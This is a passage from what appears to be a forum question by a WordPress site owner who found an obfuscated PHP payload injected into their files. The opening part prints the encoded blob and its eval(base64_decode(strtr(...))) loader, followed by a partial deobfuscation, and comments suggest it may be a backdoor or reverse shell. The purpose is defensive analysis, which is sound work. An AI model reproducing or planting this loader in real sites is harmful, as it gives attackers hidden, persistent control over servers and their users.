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";eval('?>'.$O00O0O($O0OO00($OO0O00($var5,$OO0000*2),$OO0O00($var5,$OO0000,$OO0000),$OO0O00($var5,0,$OO0000))));
```

The end of the new long string contains:

```
eval('?>'.$O00O0O($O0OO00($OO0O00($var5,$OO0000*2),$OO0O00($var5,$OO0000,$OO0000),$OO0O00($var5,0,$OO0000))));
```

Substituting the “O” and zeros variables with their computed values found above:

```
eval('?>'.base64_decode(strtr(substr($var5,52*2),substr($var5,52,52),substr($var5,0,52))));
```

The string obtained from this base64_decode(strtr(substr($var5,52*2),substr($var5,52,52),substr($var5,0,52)));
Is posted on PASTEBIN because the lenght of my post exceeded 30000 characters:

https://pastebin.com/AnqvyXgs

I honestly do not know what to make of it and hesitant to execute it on my localhost.

Any insight or help shedding the light on it would be greatly appreciated to whomever encounters such a case.
Thank you!

Comment: I suppose that the code give the attacker some kind of reverse shell to the server and allow attacker to execute those changes every time you try to reinstall your site our your accounts. I would suggest you to try to scan you server for any suspicious jobs and install in your wordpress the plugin WordFence

Comment: @PedroCosta thank you for your response. I tried scanning with Quttera but it was crashing. I guess I have to scan the backup with WordFence now. The question remains, how they were able to infect the files and do what you described!

Comment: There are many possible reasons that could have contributed to the problem like: a vulnerability in one plugin that you use, or in the wordpress itself that is unknown until now. Or could be even a faulty configuration in server itself.